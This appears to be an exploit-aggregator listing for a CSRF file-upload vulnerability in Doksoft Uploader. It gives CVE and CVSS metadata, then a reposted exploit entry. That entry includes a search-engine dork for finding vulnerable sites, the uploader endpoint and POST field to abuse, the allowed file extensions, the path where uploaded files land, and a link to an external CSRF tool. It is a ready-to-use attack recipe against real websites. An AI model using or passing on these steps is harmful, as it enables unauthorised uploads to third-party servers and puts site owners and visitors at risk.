Doksoft Uploader CSRF File Upload

CVE: CVE-2021-3456
Category: CWE-352
Price: $500
Severity: High
Author: Unknown
Risk: High
Exploitation Type: Remote
Date: 2023-12-03
CVSS: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
EPSS: 0.85521
EPSSP: 0.97585


Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023120001

Below is a copy:

Doksoft Uploader CSRF File Upload
Dork: inurl:/doksoft_uploader/userfiles/
Author: L4663r666h05t
Thanks: Bivokids - Manadoghost - Indonesian Code Party

Exploit: /doksoft_uploader/uploader.php?type=Files
CSRF post files: files[]

Allowed file extensions:
7z, aiff, asf, avi, bmp, csv, doc, docx, fla
flv, gif, gz, gzip, jpeg, jpg, mid, mov, mp3
mp4, mpc, mpeg, mpg, ods, odt, pdf, png, ppt
pptx, pxd, qt, ram, rar, rm, rmi, rmvb, rtf
sdc, sitd, swf, sxc, sxw, tar, tgz, tif, tiff
txt, vsd, wav, wma, wmv, xls, xlsx, zip

Path File: /doksoft_uploader/userfiles/files.jpg

CSRF: http://v1.exploits.my.id/?tools=csrf

Copyright ©2024 Exploitalert.